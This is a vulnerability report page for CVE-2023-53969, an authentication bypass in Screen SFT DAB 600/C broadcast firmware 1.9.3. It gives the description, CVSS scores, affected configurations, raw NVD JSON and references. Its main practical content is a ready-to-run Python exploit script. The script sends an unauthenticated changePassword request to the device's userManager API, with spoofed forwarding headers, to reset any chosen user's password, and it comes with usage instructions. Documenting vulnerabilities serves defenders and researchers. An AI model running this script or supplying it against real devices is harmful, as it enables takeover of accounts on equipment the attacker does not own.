Security Vulnerability Report
中文
CVE-2023-53969 CVSS 7.5 HIGH

CVE-2023-53969

Published: 2025-12-22 22:16:02
Last Modified: 2025-12-26 16:50:56
Source: [email protected]

Description

Screen SFT DAB 600/C firmware 1.9.3 contains a session management vulnerability that allows attackers to bypass authentication controls by exploiting IP address session binding. Attackers can reuse the same IP address and issue unauthorized requests to the userManager API to change user passwords without proper authentication.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:sft_dab_600\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:sft_dab_600\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE
Screen SFT DAB 600/C firmware <= 1.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2023-53969 PoC - Screen SFT DAB Authentication Bypass # Target: Screen SFT DAB 600/C firmware <= 1.9.3 # Vulnerability: Session management flaw allowing password change via IP spoofing def exploit(target_ip, target_username, new_password): """ Exploit CVE-2023-53969 by sending unauthorized password change request to userManager API by reusing/spoofing the source IP address. Args: target_ip: IP address of the vulnerable Screen SFT DAB device target_username: Username whose password to change new_password: New password to set Returns: bool: True if exploitation appears successful, False otherwise """ # Construct the password change API endpoint # The userManager API endpoint is typically at /api/userManager api_endpoint = f"http://{target_ip}/api/userManager" # Prepare the malicious request payload # Exploit the IP-based session binding weakness payload = { "action": "changePassword", "username": target_username, "newPassword": new_password, # The vulnerability allows bypassing authentication by exploiting # IP address session binding - system trusts requests from same IP "sessionId": "", # Empty or manipulated session } # Craft headers to simulate spoofed IP scenario headers = { "Content-Type": "application/json", "X-Forwarded-For": target_ip, # IP spoofing attempt "X-Real-IP": target_ip, # Alternative IP header "User-Agent": "Mozilla/5.0 (compatible; Screen-SFT-Client/1.0)" } try: print(f"[*] Targeting: {target_ip}") print(f"[*] Attempting to change password for user: {target_username}") # Send the exploit request response = requests.post( api_endpoint, json=payload, headers=headers, timeout=10, verify=False ) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text}") # Check for successful exploitation indicators if response.status_code == 200: if "success" in response.text.lower() or "password changed" in response.text.lower(): print("[+] Exploitation successful! Password has been changed.") return True elif "unauthorized" in response.text.lower() or "forbidden" in response.text.lower(): print("[-] Exploitation failed - target may not be vulnerable or IP not spoofable.") return False return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {str(e)}") return False def main(): if len(sys.argv) < 4: print("Usage: python cve-2023-53969.py <target_ip> <username> <new_password>") print("Example: python cve-2023-53969.py 192.168.1.100 admin NewPass123!") sys.exit(1) target_ip = sys.argv[1] username = sys.argv[2] new_password = sys.argv[3] exploit(target_ip, username, new_password) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53969", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:01.723", "lastModified": "2025-12-26T16:50:55.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Screen SFT DAB 600/C firmware 1.9.3 contains a session management vulnerability that allows attackers to bypass authentication controls by exploiting IP address session binding. Attackers can reuse the same IP address and issue unauthorized requests to the userManager API to change user passwords without proper authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:sft_dab_600\\/c_firmware:1.9.3:*:*:*:*:*:*:*", "matchCriteriaId": "B51EAD42-9B3F-44D5-973A-4758498D1339"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:sft_dab_600\\/c:-:*:*:*:*:*:*:*", "matchCriteriaId": "97E91C9F-B55C-4B1A-BE03-D1F03AC90FE5"}]}]}], "references": [{"url": "https://www.dbbroadcast.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51456", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/screen-sft-dab-c-firmware-authentication-bypass-password-change", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.